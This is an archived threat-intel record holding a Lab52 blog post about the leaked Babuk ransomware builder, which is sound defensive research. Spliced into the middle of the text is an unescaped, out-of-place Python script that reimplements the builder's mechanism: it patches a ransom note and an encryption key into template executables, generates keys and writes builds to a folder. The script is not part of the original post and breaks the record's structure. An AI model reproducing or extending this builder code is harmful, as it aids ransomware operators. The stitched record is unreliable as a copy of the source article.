{
	"id": "76eaa9b6-eb98-4dc6-bf6e-ac10f4781947",
	"created_at": "2026-04-06T01:31:47.016628Z",
	"updated_at": "2026-04-10T03:21:31.032867Z",
	"deleted_at": null,
	"sha1_hash": "b9c8d08902c118079db8579ea29e3b9d4c73634d",
	"title": "Quick review of Babuk ransomware builder",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 752776,
	"plain_text": "Quick review of Babuk ransomware builder\r\nPublished: 2021-07-05 · Archived: 2026-04-06 00:08:11 UTC\r\nLast week, the builder for the Babuk ransomware family was leaked online. Lab52 has obtained and analyzed this\r\nbuilder sample determining that it is very likely to be authentic.\r\nAfter their recent official move from Ransomware as a Service to data leaks extortions, someone uploaded to\r\nvirusTotal the ransomware builder for unknown reasons, and it was soon identified as such by British researcher\r\nKevin Beaumont.\r\nContent of Babuk builder leak\r\nWhat we first find is builder.exe, along with 2 other Windows executable files with .bin extension, 4 different\r\nUnix executables, and note.txt. At a first test, we could see how we have to tell builder.exe the output folder as an\r\nargument, and we noticed that the files generated were similar to the builder folder files.\r\nBabuk builder usage\r\nhttps://lab52.io/blog/quick-review-of-babuk-ransomware-builder/\r\nPage 1 of 6\n\nBabuk builder output\r\nAfter the successful execution, we get the two eliptic curve keys generated for encryption, 3 encryption\r\nexecutables for Windows, ARM-based NAS decives, and VMWare ESXi servers respectively, together with its\r\ncorresponding decryption executables.\r\nOne interesting thing that we found after these firsts test was that builder.exe would look for its files in the folder\r\nfrom where it is called, causing an error in case we want to execute builder.exe with an absolute path from a\r\ndifferent location, which could be considered a bug or, at least, a not so much elegant implementation.\r\nBabuk builder path bug\r\nWe decided to compare the Windows crypter executable with real samples uploaded to public sandboxes, and we\r\ncould first see useful information that was already suggesting that the builder could indeed be authentic.\r\nhttps://lab52.io/blog/quick-review-of-babuk-ransomware-builder/\r\nPage 2 of 6\n\nComparison between real 
Babuk sample and built sample\r\nWe also compared the encryption timing of the two samples, getting similar times, which reinforces its\r\nauthenticity, since Babuk has been among the top 3 fastest ransomware families in encryption speed since they fixed\r\nthe efficiency “flaws” identified by Chuong Dong during his great analysis of the three versions of Babuk. We\r\nwere also able to identify that this was a builder for their latest version.\r\nAs the final comparison to ensure the authenticity of the sample, we compared the assembly code of both files\r\nusing the IDA Pro plugin Diaphora, and they turned out to be almost identical.\r\nNot matching functions between real Babuk sample and built sample\r\nPartial matching functions real Babuk sample vs. built sample\r\nPerfect matching function from real Babuk sample vs. built sample\r\nAs could be expected, the builder takes the content of note.txt and uses it as the ransom note that\r\nis dropped on the infected machines. Since Babuk decided not to use any packing mechanism, we could\r\nalso spot in clear text the ransom note and the rest of the space reserved for the ransom note inside the built\r\nbinaries.\r\nStrings of built sample\r\nHex content of built sample\r\nAfter this, we decided to take a deeper look into the actual builder executable, and we found out that we could\r\npass an actual elliptic curve encryption key as a second argument, instead of letting the builder generate it for us,\r\nallowing the ransomware operator to use the same decryption executable for different builds. 
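To make the mechanism concrete, the script below is an added example written for this review; it is not code from the leaked Babuk builder or from Lab52. It imitates what this section and the template read/modify/write step described further down attribute to builder.exe: the output folder as first argument, an optional key as second argument (generated at random when absent), and a template binary whose reserved ransom-note region and key slot are overwritten in place and written out to the output folder. The template layout (a marker followed by a zero-filled 256-byte note region and a marker followed by a 32-byte key slot), the 32-byte key size and every file name (e_win.bin, e_win.exe, ek.key) are assumptions of the example, not Babuk's real format. Unlike the real builder, it resolves its template relative to the script rather than the working directory, which avoids the path bug noted above, and it includes a small extractor that reads the note and key back out of a built sample, the clear-text artefact that is visible precisely because no packer is used.

```python
import secrets
import sys
import tempfile
from pathlib import Path

# Constructed template layout, an assumption of this example and not Babuk's real format:
# a marker, a zero-filled region reserved for the ransom note, a marker, and a key slot.
NOTE_MARKER = b'[[NOTE_REGION]]'
NOTE_REGION_SIZE = 256
KEY_MARKER = b'[[KEY_SLOT]]'
KEY_SIZE = 32                      # assumed key length, standing in for the real curve key
TEMPLATE_NAME = 'e_win.bin'        # hypothetical template name
OUTPUT_NAME = 'e_win.exe'          # hypothetical output name
KEY_FILE_NAME = 'ek.key'           # hypothetical name of the dropped key file
DEMO_NOTE = b'Constructed ransom note for testing. Your files are encrypted.'


def make_template() -> bytes:
    # Stand-in for a leaked .bin template: fake code bytes around the reserved slots.
    return (b'MZ' + bytes(range(64)) + NOTE_MARKER + bytes(NOTE_REGION_SIZE)
            + KEY_MARKER + bytes(KEY_SIZE) + bytes(range(64, 128)))


def patch_template(template: bytes, note: bytes, key: bytes) -> bytes:
    # The read/modify/write step: find each reserved region and overwrite it in place,
    # so the output keeps exactly the template's size and layout (which is why a built
    # sample diffs almost identically against a real one).
    if len(key) != KEY_SIZE:
        raise ValueError('key must be %d bytes' % KEY_SIZE)
    if len(note) + 1 > NOTE_REGION_SIZE:     # note is NUL terminated inside the region
        raise ValueError('ransom note does not fit the reserved region')
    note_off = template.index(NOTE_MARKER) + len(NOTE_MARKER)
    key_off = template.index(KEY_MARKER) + len(KEY_MARKER)
    out = bytearray(template)
    out[note_off:note_off + NOTE_REGION_SIZE] = note.ljust(NOTE_REGION_SIZE, bytes(1))
    out[key_off:key_off + KEY_SIZE] = key
    return bytes(out)


def build(out_dir, note: bytes, key=None, templates=None) -> dict:
    # Argument handling as described for builder.exe: output folder first, optional key
    # second; a missing key is generated at random. Templates come from an explicit
    # mapping or, by default, from the folder this script lives in rather than the
    # caller's working directory, which avoids the path bug observed in the real builder.
    out_dir = Path(out_dir)
    if key is None:
        key = secrets.token_bytes(KEY_SIZE)
    if templates is None:
        template_path = Path(__file__).resolve().parent / TEMPLATE_NAME
        templates = {TEMPLATE_NAME: template_path.read_bytes()
                     if template_path.exists() else make_template()}
    out_dir.mkdir(parents=True, exist_ok=True)
    written = {}
    for name, template in templates.items():
        built = patch_template(template, note, key)
        target = out_dir / name.replace('.bin', '.exe')
        target.write_bytes(built)
        written[target.name] = len(built)
    # The post notes the decrypter expects the keys on disk next to it, so drop the key too.
    (out_dir / KEY_FILE_NAME).write_bytes(key)
    return {'key': key, 'written': written}


def extract_note_and_key(built: bytes) -> tuple:
    # Researcher side: with no packer, the note and key sit in clear text and can be
    # pulled straight out of a built sample.
    note_off = built.index(NOTE_MARKER) + len(NOTE_MARKER)
    key_off = built.index(KEY_MARKER) + len(KEY_MARKER)
    region = built[note_off:note_off + NOTE_REGION_SIZE]
    return region.split(bytes(1), 1)[0], built[key_off:key_off + KEY_SIZE]


def demo(note: bytes = DEMO_NOTE, key=None) -> dict:
    # Build into a temporary folder, then read the output back with the extractor.
    with tempfile.TemporaryDirectory() as tmp:
        result = build(tmp, note, key, {TEMPLATE_NAME: make_template()})
        built = (Path(tmp) / OUTPUT_NAME).read_bytes()
        found_note, found_key = extract_note_and_key(built)
    return {'key': result['key'], 'note': found_note,
            'extracted_key': found_key, 'size': len(built)}


if __name__ == '__main__':
    # usage: builder.py <output folder> [hex key]
    if len(sys.argv) < 2:
        sys.exit('usage: builder.py <output folder> [hex key]')
    supplied = bytes.fromhex(sys.argv[2]) if len(sys.argv) > 2 else None
    print(build(sys.argv[1], DEMO_NOTE, supplied))
```

Running the script twice with the same hex key as second argument produces two builds that share a key and therefore, as the post describes, a single decrypter; omitting the key gives a fresh random one per build. The size check in patch_template is the property worth keeping in mind when hunting unofficial variants: a builder that only patches reserved regions leaves the rest of the binary byte-identical to the template.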
Furthermore, we\r\nobserved that, if no encryption key is specified as an argument, the key is generated randomly.\r\nArgument parsing of Babuk builder\r\nIt was also predictable that the builder would use the binary files as templates, and we could identify these\r\noperations within the assembly code, where it first reads the “template” file, modifies it, and finally writes the\r\nmodified content as a new file in the specified folder.\r\nBabuk builder read of binary files as templates\r\nBabuk builder write of output binary files\r\nSince Babuk binaries did not use any packer, anyone having these files and a deep knowledge of them could\r\nhave written this builder. However, according to the compilation dates, which seem legitimate, we do not think this is\r\nthe actual scenario.\r\nAs for the decrypter, we have not analyzed its code, but during the tests we realized that it does not contain the\r\nelliptic curve keys hardcoded, so it needs to be run from a command prompt located in the same folder as\r\nthe generated keys. We could also verify that it works, but it takes a ridiculous amount of time to go\r\nthrough the whole disk and decrypt all the files.\r\nThis could be considered important since new ransomware gangs could try to take advantage of this leak for their\r\nown RaaS “startup”. However, it is also valuable for researchers since it will allow us to generate better detection\r\nrules, or even track new unofficial variations of the ransomware family.\r\nSource: https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/"
	],
	"report_names": [
		"quick-review-of-babuk-ransomware-builder"
	],
	"threat_actors": [],
	"ts_created_at": 1775439107,
	"ts_updated_at": 1775791291,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b9c8d08902c118079db8579ea29e3b9d4c73634d.pdf",
		"text": "https://archive.orkl.eu/b9c8d08902c118079db8579ea29e3b9d4c73634d.txt",
		"img": "https://archive.orkl.eu/b9c8d08902c118079db8579ea29e3b9d4c73634d.jpg"
	}
}